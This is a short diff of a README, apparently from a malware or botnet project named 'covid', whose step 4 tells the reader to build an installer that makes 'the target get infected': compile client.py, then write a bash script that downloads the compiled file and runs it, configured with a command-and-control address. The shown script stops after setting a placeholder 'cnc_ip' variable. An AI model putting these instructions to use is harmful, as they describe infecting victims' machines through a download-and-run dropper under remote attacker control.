MrScytheLULZ/covid/README.md

 4. create an installation file to make the target get infected and configure it on server.py and client.py for example:

-use a python compiler to compile client.py create the bash script that downloads the compiled file and runs it:
+use a python compiler to compile client.py then create the bash script that downloads the compiled file and runs it:
 ```
 #!/bin/bash
 cnc_ip="your cnc"